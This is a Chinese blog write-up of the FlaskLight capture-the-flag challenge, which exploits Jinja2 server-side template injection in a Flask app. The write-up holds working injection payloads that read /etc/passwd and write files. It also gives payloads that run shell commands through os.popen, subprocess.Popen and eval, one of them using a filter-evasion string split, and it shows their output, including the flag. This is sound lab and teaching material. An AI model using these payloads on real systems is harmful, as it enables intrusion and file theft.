[CSCCTF 2019 Qual]FlaskLight

已于 2023-09-20 22:27:47 修改
阅读量57 收藏
点赞数
分类专栏: CTF 文章标签: javascript linux web安全 网络安全
于 2023-09-19 22:12:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wp568/article/details/133046349
版权

F12看源码

bp抓包

由此判断为jinja2模板注入

1. 获取配置
{{config}} 

 ?search={{ ''.__class__.__mro__}}

You searched for:

(<type 'str'>, <type 'basestring'>, <type 'object'>)

?search={{ ''.__class__.__mro__[2].__subclasses__()}}

You searched for:
?search=[<type 'type'>, <type 'weakref'>, <type 'weakcallableproxy'>, <type 'weakproxy'>, <type 'int'>, <type 'basestring'>, <type 'bytearray'>, <type 'list'>, <type 'NoneType'>, <type 'NotImplementedType'>, <type 'traceback'>, <type 'super'>, <type 'xrange'>, <type 'dict'>, <type 'set'>, <type 'slice'>, <type 'staticmethod'>, <type 'complex'>, <type 'float'>, <type 'buffer'>, <type 'long'>, <type 'frozenset'>, <type 'property'>, <type 'memoryview'>, <type 'tuple'>, <type 'enumerate'>, <type 'reversed'>, <type 'code'>, <type 'frame'>, <type 'builtin_function_or_method'>, <type 'instancemethod'>, <type 'function'>, <type 'classobj'>, <type 'dictproxy'>, <type 'generator'>, <type 'getset_descriptor'>, <type 'wrapper_descriptor'>, <type 'instance'>, <type 'ellipsis'>, <type 'member_descriptor'>, <type 'file'>, <type 'PyCapsule'>, <type 'cell'>, <type 'callable-iterator'>, <type 'iterator'>, <type 'sys.long_info'>, <type 'sys.float_info'>, <type 'EncodingMap'>, <type 'fieldnameiterator'>, <type 'formatteriterator'>, <type 'sys.version_info'>, <type 'sys.flags'>, <type 'exceptions.BaseException'>, <type 'module'>, <type 'imp.NullImporter'>, <type 'zipimport.zipimporter'>, <type 'posix.stat_result'>, <type 'posix.statvfs_result'>, <class 'warnings.WarningMessage'>, <class 'warnings.catch_warnings'>, <class '_weakrefset._IterationGuard'>, <class '_weakrefset.WeakSet'>, <class '_abcoll.Hashable'>, <type 'classmethod'>, <class '_abcoll.Iterable'>, <class '_abcoll.Sized'>, <class '_abcoll.Container'>, <class '_abcoll.Callable'>, <type 'dict_keys'>, <type 'dict_items'>, <type 'dict_values'>, <class 'site._Printer'>, <class 'site._Helper'>, <type '_sre.SRE_Pattern'>, <type '_sre.SRE_Match'>, <type '_sre.SRE_Scanner'>, <class 'site.Quitter'>, <class 'codecs.IncrementalEncoder'>, <class 'codecs.IncrementalDecoder'>, <class 'string.Template'>, <class 'string.Formatter'>, <type 'collections.deque'>, <type 'deque_iterator'>, <type 'deque_reverse_iterator'>, <type 'operator.itemgetter'>, <type 'operator.attrgetter'>, <type 'operator.methodcaller'>, <type 'itertools.combinations'>, <type 'itertools.combinations_with_replacement'>, <type 'itertools.cycle'>, <type 'itertools.dropwhile'>, <type 'itertools.takewhile'>, <type 'itertools.islice'>, <type 'itertools.starmap'>, <type 'itertools.imap'>, <type 'itertools.chain'>, <type 'itertools.compress'>, <type 'itertools.ifilter'>, <type 'itertools.ifilterfalse'>, <type 'itertools.count'>, <type 'itertools.izip'>, <type 'itertools.izip_longest'>, <type 'itertools.permutations'>, <type 'itertools.product'>, <type 'itertools.repeat'>, <type 'itertools.groupby'>, <type 'itertools.tee_dataobject'>, <type 'itertools.tee'>, <type 'itertools._grouper'>, <type '_thread._localdummy'>, <type 'thread._local'>, <type 'thread.lock'>, <type 'method_descriptor'>, <class 'markupsafe._MarkupEscapeHelper'>, <type '_io._IOBase'>, <type '_io.IncrementalNewlineDecoder'>, <type '_hashlib.HASH'>, <type '_random.Random'>, <type 'cStringIO.StringO'>, <type 'cStringIO.StringI'>, <type 'cPickle.Unpickler'>, <type 'cPickle.Pickler'>, <type 'functools.partial'>, <type '_ssl._SSLContext'>, <type '_ssl._SSLSocket'>, <class 'socket._closedsocket'>, <type '_socket.socket'>, <class 'socket._socketobject'>, <class 'socket._fileobject'>, <type 'time.struct_time'>, <type 'Struct'>, <class 'urlparse.ResultMixin'>, <class 'contextlib.GeneratorContextManager'>, <class 'contextlib.closing'>, <type '_json.Scanner'>, <type '_json.Encoder'>, <class 'json.decoder.JSONDecoder'>, <class 'json.encoder.JSONEncoder'>, <class 'threading._Verbose'>, <class 'jinja2.utils.MissingType'>, <class 'jinja2.utils.LRUCache'>, <class 'jinja2.utils.Cycler'>, <class 'jinja2.utils.Joiner'>, <class 'jinja2.utils.Namespace'>, <class 'jinja2.bccache.Bucket'>, <class 'jinja2.bccache.BytecodeCache'>, <class 'jinja2.nodes.EvalContext'>, <class 'jinja2.visitor.NodeVisitor'>, <class 'jinja2.nodes.Node'>, <class 'jinja2.idtracking.Symbols'>, <class 'jinja2.compiler.MacroRef'>, <class 'jinja2.compiler.Frame'>, <class 'jinja2.runtime.TemplateReference'>, <class 'numbers.Number'>, <class 'jinja2.runtime.Context'>, <class 'jinja2.runtime.BlockReference'>, <class 'jinja2.runtime.Macro'>, <class 'jinja2.runtime.Undefined'>, <class 'decimal.Decimal'>, <class 'decimal._ContextManager'>, <class 'decimal.Context'>, <class 'decimal._WorkRep'>, <class 'decimal._Log10Memoize'>, <type '_ast.AST'>, <class 'ast.NodeVisitor'>, <class 'jinja2.lexer.Failure'>, <class 'jinja2.lexer.TokenStreamIterator'>, <class 'jinja2.lexer.TokenStream'>, <class 'jinja2.lexer.Lexer'>, <class 'jinja2.parser.Parser'>, <class 'jinja2.environment.Environment'>, <class 'jinja2.environment.Template'>, <class 'jinja2.environment.TemplateModule'>, <class 'jinja2.environment.TemplateExpression'>, <class 'jinja2.environment.TemplateStream'>, <class 'jinja2.loaders.BaseLoader'>, <type 'datetime.date'>, <type 'datetime.timedelta'>, <type 'datetime.time'>, <type 'datetime.tzinfo'>, <class 'logging.LogRecord'>, <class 'logging.Formatter'>, <class 'logging.BufferingFormatter'>, <class 'logging.Filter'>, <class 'logging.Filterer'>, <class 'logging.PlaceHolder'>, <class 'logging.Manager'>, <class 'logging.LoggerAdapter'>, <class 'werkzeug._internal._Missing'>, <class 'werkzeug._internal._DictAccessorProperty'>, <class 'werkzeug.utils.HTMLBuilder'>, <class 'werkzeug.exceptions.Aborter'>, <class 'werkzeug.urls.Href'>, <type 'select.epoll'>, <class 'click._compat._FixupStream'>, <class 'click._compat._AtomicFile'>, <class 'click.utils.LazyFile'>, <class 'click.utils.KeepOpenFile'>, <class 'click.utils.PacifyFlushWrapper'>, <class 'click.parser.Option'>, <class 'click.parser.Argument'>, <class 'click.parser.ParsingState'>, <class 'click.parser.OptionParser'>, <class 'click.types.ParamType'>, <class 'click.formatting.HelpFormatter'>, <class 'click.core.Context'>, <class 'click.core.BaseCommand'>, <class 'click.core.Parameter'>, <class 'werkzeug.serving.WSGIRequestHandler'>, <class 'werkzeug.serving._SSLContext'>, <class 'werkzeug.serving.BaseWSGIServer'>, <class 'werkzeug.datastructures.ImmutableListMixin'>, <class 'werkzeug.datastructures.ImmutableDictMixin'>, <class 'werkzeug.datastructures.UpdateDictMixin'>, <class 'werkzeug.datastructures.ViewItems'>, <class 'werkzeug.datastructures._omd_bucket'>, <class 'werkzeug.datastructures.Headers'>, <class 'werkzeug.datastructures.ImmutableHeadersMixin'>, <class 'werkzeug.datastructures.IfRange'>, <class 'werkzeug.datastructures.Range'>, <class 'werkzeug.datastructures.ContentRange'>, <class 'werkzeug.datastructures.FileStorage'>, <class 'email.LazyImporter'>, <class 'calendar.Calendar'>, <class 'werkzeug.wrappers.accept.AcceptMixin'>, <class 'werkzeug.wrappers.auth.AuthorizationMixin'>, <class 'werkzeug.wrappers.auth.WWWAuthenticateMixin'>, <class 'werkzeug.wsgi.ClosingIterator'>, <class 'werkzeug.wsgi.FileWrapper'>, <class 'werkzeug.wsgi._RangeWrapper'>, <class 'werkzeug.formparser.FormDataParser'>, <class 'werkzeug.formparser.MultiPartParser'>, <class 'werkzeug.wrappers.base_request.BaseRequest'>, <class 'werkzeug.wrappers.base_response.BaseResponse'>, <class 'werkzeug.wrappers.common_descriptors.CommonRequestDescriptorsMixin'>, <class 'werkzeug.wrappers.common_descriptors.CommonResponseDescriptorsMixin'>, <class 'werkzeug.wrappers.etag.ETagRequestMixin'>, <class 'werkzeug.wrappers.etag.ETagResponseMixin'>, <class 'werkzeug.wrappers.cors.CORSRequestMixin'>, <class 'werkzeug.wrappers.cors.CORSResponseMixin'>, <class 'werkzeug.useragents.UserAgentParser'>, <class 'werkzeug.useragents.UserAgent'>, <class 'werkzeug.wrappers.user_agent.UserAgentMixin'>, <class 'werkzeug.wrappers.request.StreamOnlyMixin'>, <class 'werkzeug.wrappers.response.ResponseStream'>, <class 'werkzeug.wrappers.response.ResponseStreamMixin'>, <class 'werkzeug.test._TestCookieHeaders'>, <class 'werkzeug.test._TestCookieResponse'>, <class 'werkzeug.test.EnvironBuilder'>, <class 'werkzeug.test.Client'>, <class 'uuid.UUID'>, <type 'CArgObject'>, <type '_ctypes.CThunkObject'>, <type '_ctypes._CData'>, <type '_ctypes.CField'>, <type '_ctypes.DictRemover'>, <class 'ctypes.CDLL'>, <class 'ctypes.LibraryLoader'>, <class 'subprocess.Popen'>, <class 'itsdangerous._json._CompactJSON'>, <class 'itsdangerous.signer.SigningAlgorithm'>, <class 'itsdangerous.signer.Signer'>, <class 'itsdangerous.serializer.Serializer'>, <class 'itsdangerous.url_safe.URLSafeSerializerMixin'>, <class 'flask._compat._DeprecatedBool'>, <class 'werkzeug.local.Local'>, <class 'werkzeug.local.LocalStack'>, <class 'werkzeug.local.LocalManager'>, <class 'werkzeug.local.LocalProxy'>, <class 'difflib.HtmlDiff'>, <class 'werkzeug.routing.RuleFactory'>, <class 'werkzeug.routing.RuleTemplate'>, <class 'werkzeug.routing.BaseConverter'>, <class 'werkzeug.routing.Map'>, <class 'werkzeug.routing.MapAdapter'>, <class 'flask.signals.Namespace'>, <class 'flask.signals._FakeSignal'>, <class 'flask.helpers.locked_cached_property'>, <class 'flask.helpers._PackageBoundObject'>, <class 'flask.cli.DispatchingApp'>, <class 'flask.cli.ScriptInfo'>, <class 'flask.config.ConfigAttribute'>, <class 'flask.ctx._AppCtxGlobals'>, <class 'flask.ctx.AppContext'>, <class 'flask.ctx.RequestContext'>, <class 'flask.json.tag.JSONTag'>, <class 'flask.json.tag.TaggedJSONSerializer'>, <class 'flask.sessions.SessionInterface'>, <class 'werkzeug.wrappers.json._JSONModule'>, <class 'werkzeug.wrappers.json.JSONMixin'>, <class 'flask.blueprints.BlueprintSetupState'>, <type 'unicodedata.UCD'>, <type 'array.array'>, <type 'method-wrapper'>, <class 'jinja2.ext.Extension'>, <class 'jinja2.ext._CommentFinder'>]

有可以利用的类:<type 'file'>、<class 'site._Printer'>、<class 'subprocess.Popen'>、<class 'warnings.catch_warnings'>,并发现没有内置os,需要import os。

参考:

1、<type 'file'> 读写文件,file类位置一般为40,直接调用
{{"".__class__.__base__.__subclasses__()[40]('/etc/passwd').read()}}
{{().__class__.__base__.__subclasses__()[40]('/var/www/html/input.txt', 'w').write('hello123')}}

2、<class 'site._Printer'> 直接用os的popen执行命令(绕过globals)
{{"".__class__.__base__.__subclasses__()[71].__init__['__glo'+'bals__']['os'].popen('ls').read()}}
如果system被过滤,用os的listdir读取目录+file模块读取文件:
{{().__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].listdir('.')}}

3、<class 'subprocess.Popen'> 执行命令
{{''.__class__.__mro__[1].__subclasses__()[258]('ls',shell=True,stdout=-1).communicate()[0].strip()}}

4、<class 'warnings.catch_warnings'> 执行命令
调用eval
{{[].__class__.__base__.__subclasses__()[59].__init__['__globals__']['__builtins__']['eval']("__import__('os').popen('ls').read()")}}
{{''.__class__.__base__.__subclasses__()[59].__init__.__globals__.__builtins__['__import__']('os').__dict__['popen']('ls').read()}}

没有加载OS模块。所以在执行命令的时候需要自己加载OS模块

# 读写文件 read(),write()
{{''.__class__.__mro__[1].__subclasses__()[59].__init__.__globals__['__builtins__'].['file']('/etc/passwd').read()}}

调用system方法。(不包含system,可以绕过过滤system的情况)
{{[].__class__.__base__.__subclasses__()[59].__init__.__globals__['linecache'].__dict__.values()[12].__dict__.values()[144]('whoami')}}
利用commands进行命令执行
{{{}.__class__.__bases__[0].__subclasses__()[59].__init__.__globals__['__builtins__']['__import__']('commands').getstatusoutput('ls')}}

对这数据进行简单的处理:将<>换成"",再将这些数据放在列表中,通过list.index输出想要的类在第几位。

__subclasses__()后面下标获取脚本:

list = ["type 'type'", "type 'weakref'", "type 'weakcallableproxy'", "type 'weakproxy'", "type 'int'", "type 'basestring'", "type 'bytearray'", "type 'list'", "type 'NoneType'", "type 'NotImplementedType'", "type 'traceback'", "type 'super'", "type 'xrange'", "type 'dict'", "type 'set'", "type 'slice'", "type 'staticmethod'", "type 'complex'", "type 'float'", "type 'buffer'", "type 'long'", "type 'frozenset'", "type 'property'", "type 'memoryview'", "type 'tuple'", "type 'enumerate'", "type 'reversed'", "type 'code'", "type 'frame'", "type 'builtin_function_or_method'", "type 'instancemethod'", "type 'function'", "type 'classobj'", "type 'dictproxy'", "type 'generator'", "type 'getset_descriptor'", "type 'wrapper_descriptor'", "type 'instance'", "type 'ellipsis'", "type 'member_descriptor'", "type 'file'", "type 'PyCapsule'", "type 'cell'", "type 'callable-iterator'", "type 'iterator'", "type 'sys.long_info'", "type 'sys.float_info'", "type 'EncodingMap'", "type 'fieldnameiterator'", "type 'formatteriterator'", "type 'sys.version_info'", "type 'sys.flags'", "type 'exceptions.BaseException'", "type 'module'", "type 'imp.NullImporter'", "type 'zipimport.zipimporter'", "type 'posix.stat_result'", "type 'posix.statvfs_result'", "class 'warnings.WarningMessage'", "class 'warnings.catch_warnings'", "class '_weakrefset._IterationGuard'", "class '_weakrefset.WeakSet'", "class '_abcoll.Hashable'", "type 'classmethod'", "class '_abcoll.Iterable'", "class '_abcoll.Sized'", "class '_abcoll.Container'", "class '_abcoll.Callable'", "type 'dict_keys'", "type 'dict_items'", "type 'dict_values'", "class 'site._Printer'", "class 'site._Helper'", "type '_sre.SRE_Pattern'", "type '_sre.SRE_Match'", "type '_sre.SRE_Scanner'", "class 'site.Quitter'", "class 'codecs.IncrementalEncoder'", "class 'codecs.IncrementalDecoder'", "class 'string.Template'", "class 'string.Formatter'", "type 'collections.deque'", "type 'deque_iterator'", "type 'deque_reverse_iterator'", "type 'operator.itemgetter'", "type 'operator.attrgetter'", "type 'operator.methodcaller'", "type 'itertools.combinations'", "type 'itertools.combinations_with_replacement'", "type 'itertools.cycle'", "type 'itertools.dropwhile'", "type 'itertools.takewhile'", "type 'itertools.islice'", "type 'itertools.starmap'", "type 'itertools.imap'", "type 'itertools.chain'", "type 'itertools.compress'", "type 'itertools.ifilter'", "type 'itertools.ifilterfalse'", "type 'itertools.count'", "type 'itertools.izip'", "type 'itertools.izip_longest'", "type 'itertools.permutations'", "type 'itertools.product'", "type 'itertools.repeat'", "type 'itertools.groupby'", "type 'itertools.tee_dataobject'", "type 'itertools.tee'", "type 'itertools._grouper'", "type '_thread._localdummy'", "type 'thread._local'", "type 'thread.lock'", "type 'method_descriptor'", "class 'markupsafe._MarkupEscapeHelper'", "type '_io._IOBase'", "type '_io.IncrementalNewlineDecoder'", "type '_hashlib.HASH'", "type '_random.Random'", "type 'cStringIO.StringO'", "type 'cStringIO.StringI'", "type 'cPickle.Unpickler'", "type 'cPickle.Pickler'", "type 'functools.partial'", "type '_ssl._SSLContext'", "type '_ssl._SSLSocket'", "class 'socket._closedsocket'", "type '_socket.socket'", "class 'socket._socketobject'", "class 'socket._fileobject'", "type 'time.struct_time'", "type 'Struct'", "class 'urlparse.ResultMixin'", "class 'contextlib.GeneratorContextManager'", "class 'contextlib.closing'", "type '_json.Scanner'", "type '_json.Encoder'", "class 'json.decoder.JSONDecoder'", "class 'json.encoder.JSONEncoder'", "class 'threading._Verbose'", "class 'jinja2.utils.MissingType'", "class 'jinja2.utils.LRUCache'", "class 'jinja2.utils.Cycler'", "class 'jinja2.utils.Joiner'", "class 'jinja2.utils.Namespace'", "class 'jinja2.bccache.Bucket'", "class 'jinja2.bccache.BytecodeCache'", "class 'jinja2.nodes.EvalContext'", "class 'jinja2.visitor.NodeVisitor'", "class 'jinja2.nodes.Node'", "class 'jinja2.idtracking.Symbols'", "class 'jinja2.compiler.MacroRef'", "class 'jinja2.compiler.Frame'", "class 'jinja2.runtime.TemplateReference'", "class 'numbers.Number'", "class 'jinja2.runtime.Context'", "class 'jinja2.runtime.BlockReference'", "class 'jinja2.runtime.Macro'", "class 'jinja2.runtime.Undefined'", "class 'decimal.Decimal'", "class 'decimal._ContextManager'", "class 'decimal.Context'", "class 'decimal._WorkRep'", "class 'decimal._Log10Memoize'", "type '_ast.AST'", "class 'ast.NodeVisitor'", "class 'jinja2.lexer.Failure'", "class 'jinja2.lexer.TokenStreamIterator'", "class 'jinja2.lexer.TokenStream'", "class 'jinja2.lexer.Lexer'", "class 'jinja2.parser.Parser'", "class 'jinja2.environment.Environment'", "class 'jinja2.environment.Template'", "class 'jinja2.environment.TemplateModule'", "class 'jinja2.environment.TemplateExpression'", "class 'jinja2.environment.TemplateStream'", "class 'jinja2.loaders.BaseLoader'", "type 'datetime.date'", "type 'datetime.timedelta'", "type 'datetime.time'", "type 'datetime.tzinfo'", "class 'logging.LogRecord'", "class 'logging.Formatter'", "class 'logging.BufferingFormatter'", "class 'logging.Filter'", "class 'logging.Filterer'", "class 'logging.PlaceHolder'", "class 'logging.Manager'", "class 'logging.LoggerAdapter'", "class 'werkzeug._internal._Missing'", "class 'werkzeug._internal._DictAccessorProperty'", "class 'werkzeug.utils.HTMLBuilder'", "class 'werkzeug.exceptions.Aborter'", "class 'werkzeug.urls.Href'", "type 'select.epoll'", "class 'click._compat._FixupStream'", "class 'click._compat._AtomicFile'", "class 'click.utils.LazyFile'", "class 'click.utils.KeepOpenFile'", "class 'click.utils.PacifyFlushWrapper'", "class 'click.parser.Option'", "class 'click.parser.Argument'", "class 'click.parser.ParsingState'", "class 'click.parser.OptionParser'", "class 'click.types.ParamType'", "class 'click.formatting.HelpFormatter'", "class 'click.core.Context'", "class 'click.core.BaseCommand'", "class 'click.core.Parameter'", "class 'werkzeug.serving.WSGIRequestHandler'", "class 'werkzeug.serving._SSLContext'", "class 'werkzeug.serving.BaseWSGIServer'", "class 'werkzeug.datastructures.ImmutableListMixin'", "class 'werkzeug.datastructures.ImmutableDictMixin'", "class 'werkzeug.datastructures.UpdateDictMixin'", "class 'werkzeug.datastructures.ViewItems'", "class 'werkzeug.datastructures._omd_bucket'", "class 'werkzeug.datastructures.Headers'", "class 'werkzeug.datastructures.ImmutableHeadersMixin'", "class 'werkzeug.datastructures.IfRange'", "class 'werkzeug.datastructures.Range'", "class 'werkzeug.datastructures.ContentRange'", "class 'werkzeug.datastructures.FileStorage'", "class 'email.LazyImporter'", "class 'calendar.Calendar'", "class 'werkzeug.wrappers.accept.AcceptMixin'", "class 'werkzeug.wrappers.auth.AuthorizationMixin'", "class 'werkzeug.wrappers.auth.WWWAuthenticateMixin'", "class 'werkzeug.wsgi.ClosingIterator'", "class 'werkzeug.wsgi.FileWrapper'", "class 'werkzeug.wsgi._RangeWrapper'", "class 'werkzeug.formparser.FormDataParser'", "class 'werkzeug.formparser.MultiPartParser'", "class 'werkzeug.wrappers.base_request.BaseRequest'", "class 'werkzeug.wrappers.base_response.BaseResponse'", "class 'werkzeug.wrappers.common_descriptors.CommonRequestDescriptorsMixin'", "class 'werkzeug.wrappers.common_descriptors.CommonResponseDescriptorsMixin'", "class 'werkzeug.wrappers.etag.ETagRequestMixin'", "class 'werkzeug.wrappers.etag.ETagResponseMixin'", "class 'werkzeug.wrappers.cors.CORSRequestMixin'", "class 'werkzeug.wrappers.cors.CORSResponseMixin'", "class 'werkzeug.useragents.UserAgentParser'", "class 'werkzeug.useragents.UserAgent'", "class 'werkzeug.wrappers.user_agent.UserAgentMixin'", "class 'werkzeug.wrappers.request.StreamOnlyMixin'", "class 'werkzeug.wrappers.response.ResponseStream'", "class 'werkzeug.wrappers.response.ResponseStreamMixin'", "class 'werkzeug.test._TestCookieHeaders'", "class 'werkzeug.test._TestCookieResponse'", "class 'werkzeug.test.EnvironBuilder'", "class 'werkzeug.test.Client'", "class 'uuid.UUID'", "type 'CArgObject'", "type '_ctypes.CThunkObject'", "type '_ctypes._CData'", "type '_ctypes.CField'", "type '_ctypes.DictRemover'", "class 'ctypes.CDLL'", "class 'ctypes.LibraryLoader'", "class 'subprocess.Popen'", "class 'itsdangerous._json._CompactJSON'", "class 'itsdangerous.signer.SigningAlgorithm'", "class 'itsdangerous.signer.Signer'", "class 'itsdangerous.serializer.Serializer'", "class 'itsdangerous.url_safe.URLSafeSerializerMixin'", "class 'flask._compat._DeprecatedBool'", "class 'werkzeug.local.Local'", "class 'werkzeug.local.LocalStack'", "class 'werkzeug.local.LocalManager'", "class 'werkzeug.local.LocalProxy'", "class 'difflib.HtmlDiff'", "class 'werkzeug.routing.RuleFactory'", "class 'werkzeug.routing.RuleTemplate'", "class 'werkzeug.routing.BaseConverter'", "class 'werkzeug.routing.Map'", "class 'werkzeug.routing.MapAdapter'", "class 'flask.signals.Namespace'", "class 'flask.signals._FakeSignal'", "class 'flask.helpers.locked_cached_property'", "class 'flask.helpers._PackageBoundObject'", "class 'flask.cli.DispatchingApp'", "class 'flask.cli.ScriptInfo'", "class 'flask.config.ConfigAttribute'", "class 'flask.ctx._AppCtxGlobals'", "class 'flask.ctx.AppContext'", "class 'flask.ctx.RequestContext'", "class 'flask.json.tag.JSONTag'", "class 'flask.json.tag.TaggedJSONSerializer'", "class 'flask.sessions.SessionInterface'", "class 'werkzeug.wrappers.json._JSONModule'", "class 'werkzeug.wrappers.json.JSONMixin'", "class 'flask.blueprints.BlueprintSetupState'", "type 'unicodedata.UCD'", "class 'jinja2.ext.Extension'", "class 'jinja2.ext._CommentFinder'", "type 'array.array'", "type 'method-wrapper'"]

print(list.index("type 'file'"))
print(list.index("class 'warnings.catch_warnings'"))
print(list.index("class 'site._Printer'"))
print(list.index("class 'subprocess.Popen'"))

输出:

40
59
71
258

<type 'file'> file类位置为40,直接调用

?search={{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}

You searched for:
?search=root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false _apt:x:104:65534::/nonexistent:/bin/false

class 'warnings.catch_warnings'的位置为59

?search={{[].__class__.__base__.__subclasses__()[59].__init__['__glo'+'bals__']['__builtins__']['eval']("__import__('os').popen('ls').read()")}}

You searched for:
bin boot dev etc flasklight home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var

 ?search={{[].__class__.__base__.__subclasses__()[59].__init__['__glo'+'bals__']['__builtins__']['eval']("__import__('os').popen('ls /flasklight').read()")}}

You searched for:
?search=app.py coomme_geeeett_youur_flek

?search={{[].__class__.__base__.__subclasses__()[59].__init__['__glo'+'bals__']['__builtins__']['eval']("__import__('os').popen('cat /flasklight/coomme_geeeett_youur_flek').read()")}}

或者:

{{''.__class__.__mro__[2].__subclasses__()[40]('/flasklight/coomme_geeeett_youur_flek').read() }}

You searched for:
flag{d946a025-350c-41aa-b71b-636e062b38ec}

半两八金
关注
专栏目录
BUUCTF:[CSCCTF 2019 Qual]FlaskLight
末初的CSDN博客
07-26 2795
题目地址:https://buuoj.cn/challenges#[CSCCTF%202019%20Qual]FlaskLight ?search={{7*7}} #通过回显判断SSTI ?search={{''.__class__.__mro__[2].__subclasses__()}} #爆出所有类 编写脚本查找可利用的类 利用subprocess.Popen执行命令 import requests import re import html import time index = 0 f
[CSCCTF 2019 Qual]FlaskLight (jinja2模版注入)
weixin_73399382的博客
08-07 510
这种有参数的我先直接丢fengjing扫了一下,结果还真搞出来,这工具还是挺牛的,就是没参数的时候搞不了。输入{{7*‘7’}},返回7777777表示是 Jinjia2 模块。进入web界面输入前三个参数,表单输入就是刚才的search参数。输入{{config}}查看配置发现提示flag就在当前目录下。分析完后右边会提示你输入可以输入命令自动生成payload。或者中间加个+号也可以['__glo'+'bals__']输入{{7*‘7’}},返回49表示是 Twig 模块。下面是判断模版注入的方法。
[CSCCTF 2019 Qual]FlaskLight 1
ubaichu的博客
07-19 954
[CSCCTF 2019 Qual]FlaskLight 1 详细解题步骤
一道[CSCCTF 2019 Qual]FlaskLight的详解再遇SSTI
sGanYu
07-29 1758
做这道题的时候,再次深入了解了一下SSTI,不过发现去讲解这题原理的文章实在是太少了,额也有可能是大佬觉得没有必要讲,不过在这里还是记录一下自己的一些解题思路,一方面也是防止自己忘记,可能会有错误,欢迎前来指正。.........
ssti练习之[CSCCTF 2019 Qual]FlaskLight 1
weixin_48335916的博客
01-05 570
[CSCCTF 2019 Qual]FlaskLight 1 查看网页源代码,发现里面的提示 尝试输入url http://e1f8bf68-fab7-482f-901b-12c336d1cdeb.node3.buuoj.cn/?search={{1*9}} 成功回显,说明存在ssti注入 使用{{’’.class.mro[2].subclasses()}},可以爆出object类中所有子类,找出subprocess.Popen,copy大佬额exp。 import requests import r
[CSCCTF 2019 Qual] FlaskLight
汗的博客
08-29 1584
信息收集 index大致就这样,没什么信息 F12看下,发现了线索:search参数 试下ssti 基本就是ssti了 漏洞利用 config 也是 Flask模版中的一个全局对象,它包含了所有应用程序的配置值。 {{ config.items() }} // 查看配置项目的信息 输入:http://xxxxx//?search={{%20config.items()%20}} 爆出一堆信息,这里获得第二个线索,flag在这个目录 You searched for: [('JSON_
[CSCCTF 2019 Qual]FlaskLight SSTI注入
qq_54929891的博客
04-05 2320
进去后页面提示你是flask框架,f12里面告诉你参数名字叫做search并且用GET方法传输,十有八九是模块注入了,用7*7试试服务端模板注入攻击 - 知乎 可以发现在searched后面输出了49,既然我们可以利用{{}},又有输出点,直接模板注入GOGOGO python-flask模块注入(SSTI) - ctrl_TT豆 - 博客园因为不太熟,只能一步步来 ''.__class__ //先随便查看一个字符所属的类是什么 ''.__class__.__mro__ //返回...
checker-qual-3.5.0-API文档-中文版.zip
06-05
赠送jar包:checker-qual-3.5.0.jar; 赠送原API文档:checker-qual-3.5.0-javadoc.jar; 赠送源代码:checker-qual-3.5.0-sources.jar; 赠送Maven依赖信息文件:checker-qual-3.5.0.pom; 包含翻译后的API文档:...
checker-qual-3.5.0-API文档-中英对照版.zip
05-11
赠送jar包:checker-qual-3.5.0.jar; 赠送原API文档:checker-qual-3.5.0-javadoc.jar; 赠送源代码:checker-qual-3.5.0-sources.jar; 赠送Maven依赖信息文件:checker-qual-3.5.0.pom; 包含翻译后的API文档:...
checker-qual-2.11.1-API文档-中英对照版.zip
07-14
赠送jar包:checker-qual-2.11.1.jar; 赠送原API文档:checker-qual-2.11.1-javadoc.jar; 赠送源代码:checker-qual-2.11.1-sources.jar; 赠送Maven依赖信息文件:checker-qual-2.11.1.pom; 包含翻译后的API文档...
【JAVA开源】基于Vue和SpringBoot的高校学科竞赛平台
杨荧的CSDN博客
10-10 999
教师功能有个人中心,题目类型管理,竞赛题库管理,竞赛类型管理,竞赛信息管理,报名信息管理,竞赛评分管理,参赛名单管理,晋级名单管理,获奖名单管理,竞赛总结管理,报销清单管理,成绩申诉管理,参赛信息管理,参赛信息管理,往年成绩管理,获奖情况管理。
Vue根实例、实例总结
m0_54007573的博客
10-04 682
Vue根实例、实例总结
React中的refs是什么?
最新发布
Front end development engineer
10-10 223
React 的众多优点之一是它抽象了处理真实 DOM 的复杂性。现在,我们无需手动查询元素、绞尽脑汁思考如何为这些元素添加类又或者是添加样式等,也无需为浏览器兼容性而苦恼,只需编写组件并专注于用户体验即可。然而,仍然有一些情况(虽然很少!)我们需要访问实际的 DOM。而当涉及到实际的 DOM 时,最重要的是要理解并学习如何正确使用 ref 以及 ref 周围的一切。
解释器、预处理、main函数
编程语言技巧经验分享
10-07 1236
解释器覆盖范围很广,不管是解释语言的运行时解释翻译器,还是操作系统自带脚本的解释器。
vue-live2d看板娘集成方案设计使用教程
每个人都是独一无二的,把握好自己的节奏,跟着自己的心走。
10-05 1488
vue-live2d看板娘集成方案设计使用教程
javascript中==和===有什么不同
qq_48763502的博客
10-09 399
这个运算符用于比较两个值是否相等,但会在必要时进行类型转换。当两个值的类型不同,JavaScript 会尝试将它们转换为相同的类型,然后再进行比较。
解决IE中a标签中的图片有边框
weixin_41674235的博客
10-08 171
